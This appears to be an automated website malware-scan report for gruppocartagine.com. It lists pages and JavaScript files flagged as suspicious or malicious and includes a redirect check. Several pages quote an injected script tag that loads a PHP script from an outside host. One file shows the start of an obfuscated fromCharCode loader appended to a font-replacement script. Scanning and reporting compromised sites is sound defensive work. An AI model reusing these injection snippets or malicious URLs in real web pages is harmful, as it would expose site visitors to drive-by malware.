Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gruppocartagine.com
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gruppocartagine.com/ | 200 OK Content-Length: 8713 Content-Type: text/html | suspicious |
Suspicious code found: an external script is loaded from a host other than the scanned site. <script type="text/javascript" src="http://jobboerse.markt-wartenberg.de/mK84FQk7.php?id=52850900"></script> | ||
http://gruppocartagine.com/js/jquery-1.6.3.min.js | 200 OK Content-Length: 173287 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a,b){function cu(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cr(a){if(!cg[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ch||(ch=c.createElement("iframe"),ch.frameBorder=ch.width=ch.height=0),b.appendChild(ch);if(!ci||!ch.createElement)ci=(ch.contentWindow||ch.contentDocument).document,ci.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),ci.close();d=c /*/8f4d8e*/ /*/0f2490*/ Antivirus reports:
| ||
http://gruppocartagine.com/js/cufon-yui.js | 200 OK Content-Length: 21446 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&& /*/8f4d8e*/ /*/0f2490*/ Antivirus reports:
| ||
http://gruppocartagine.com/js/cufon-replace.js | 200 OK Content-Length: 3305 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.replace('.menu li a, h3, h4, .support, h1 a, .button, .button-2', { fontFamily: 'NewsGoth BT', hover:true }); ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v=123;vzs=0;try{document;}catch(q){vzs=1;}if Antivirus reports:
| ||
http://gruppocartagine.com/js/NewsGoth_BT_400.font.js | 200 OK Content-Length: 18946 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.registerFont({"w":216,"face":{"font-family":"NewsGoth BT","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 5 3 2 2 3 2 2 4","ascent":"288","descent":"-72","x-height":"3","bbox":"-15 -283 340 85","underline-thickness":"18.6328","underline-position":"-24.9609","unicode-range":"U 0020-U 007E"},"glyphs":{" ":{"w":108},"!":{"d":"46,-83r-8,-177r34,0r-7,177r-19,0xm38,0r0,-41r35,0r0,41r-35,0","w":111},"\"":{"d":"87,-252r0,97r-21,0r0,-97r21,0xm37,-252r0,97r-20,0r0,-97 /*/8f4d8e*/ /*/0f2490*/ Antivirus reports:
| ||
http://gruppocartagine.com/js/FF-cash.js | 200 OK Content-Length: 3566 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if($.browser.mozilla||$.browser.opera) (function(){ window.addEventListener('pageshow', PageShowHandler, false); window.addEventListener('unload', UnloadHandler, false); function PageShowHandler() { window.addEventListener('unload', UnloadHandler, false); } function UnloadHandler() { window.removeEventListener('beforeunload', UnloadHandler, false); } })() Antivirus reports:
| ||
http://gruppocartagine.com/js/script.js | 200 OK Content-Length: 6513 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { $(".list-services .tooltips").easyTooltip(); }); $(document).ready(function(){ var slideShow = $('#slideShow'), ul = slideShow.find('ul'), li = ul.find('li'), cnt = li.length; updateZindex(); if($.support.transform){ li.find('img').css('rotate',function(i){ return (-90*i) 'deg'; }); slideShow.bind('rotateContainer',function(e,direction,degrees){ Antivirus reports:
| ||
http://gruppocartagine.com/js/jquery.equalheights.js | 200 OK Content-Length: 3656 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){$.fn.equalHeights=function(minHeight,maxHeight){tallest=(minHeight)?minHeight:0;this.each(function(){if($(this).height()>tallest){tallest=$(this).height()}});if((maxHeight)&&tallest>maxHeight)tallest=maxHeight;return this.each(function(){$(this).height(tallest)})}})(jQuery) $(window).load(function(){ if($(".maxheight").length){ $(".maxheight").equalHeights()} }) $(window).load(function(){ if($(".maxheight2").length){ $(".maxheight2").equ Antivirus reports:
| ||
http://gruppocartagine.com/js/jquery.easing.1.3.js | 200 OK Content-Length: 11287 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t b; retur Antivirus reports:
| ||
http://gruppocartagine.com/js/tms-0.3.js | 200 OK Content-Length: 14945 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($,undefined){ var _TMS=window._TMS=$.fn._TMS=function(_){ _=_||{} _=$.extend(clone(_TMS),_TMS.presets[_.preset],_) _.init.call(_.me=_.holder=this,_) return _.me.data({opt:_}) } $.extend(_TMS,{ etal:'<div></div>', items:'.items>li', pic:'pic', mask:'mask', paginationCl:'pagination', currCl:'current', pauseCl:'paused', bannerCl:'banner', numStatusCl:'numStatus', 339810*/ Antivirus reports:
| ||
http://gruppocartagine.com/js/tms_presets.js | 200 OK Content-Length: 21835 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function ($, undefined) { $.extend(_TMS, { presets:{ zoomer:{"reverseWay":false,"duration":"1000","interval":"1","blocksX":"1","blocksY":"1","easing":"","way":"lines","anim":"zoomer",k:1.8,crds:{bottom:0,right:0}}, fadeThree:{"reverseWay":false,"duration":"1000","interval":"1","blocksX":"1","blocksY":"1","easing":"","way":"lines","anim":"fadeThree"}, simpleFade:{"reverseWay":false,"duration":"1000","interval":"1","blocksX":"1","blocksY":"1","easing":"","way":" Antivirus reports:
| ||
http://gruppocartagine.com/js/easyTooltip.js | 200 OK Content-Length: 5006 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.easyTooltip = function(options){ var defaults = { xOffset: 10, yOffset: 25, tooltipId: "easyTooltip", clickRemove: false, content: "", useElement: "" }; var options = $.extend(defaults, options); var content; this.each(function() { var title = $(this).attr("title"); $(this).hover(function(e){ content = (options.con Antivirus reports:
| ||
http://gruppocartagine.com/index.html | 200 OK Content-Length: 8713 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://jobboerse.markt-wartenberg.de/mK84FQk7.php?id=52850900"></script> | ||
http://gruppocartagine.com/services.html | 200 OK Content-Length: 7571 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://jobboerse.markt-wartenberg.de/mK84FQk7.php?id=52850904"></script> | ||
http://gruppocartagine.com/staff.html | 200 OK Content-Length: 5308 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://jobboerse.markt-wartenberg.de/mK84FQk7.php?id=52850907"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gruppocartagine.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Jan 2015 11:29:03 GMT
Accept-Ranges: bytes
Server: Apache
Content-Language: it
Content-Length: 8713
Content-Type: text/html
Last-Modified: Fri, 28 Feb 2014 08:34:34 GMT
...8713 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: gruppocartagine.com
Referer: http://www.google.com/search?q=gruppocartagine.com
Result:
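The response is similar to the first query: no suspicious redirects were found when the request carried a search-engine Referer. This check compares the server's HTTP responses only; the script tags reported under "Scanned pages/files" are a separate finding and are not cleared by it.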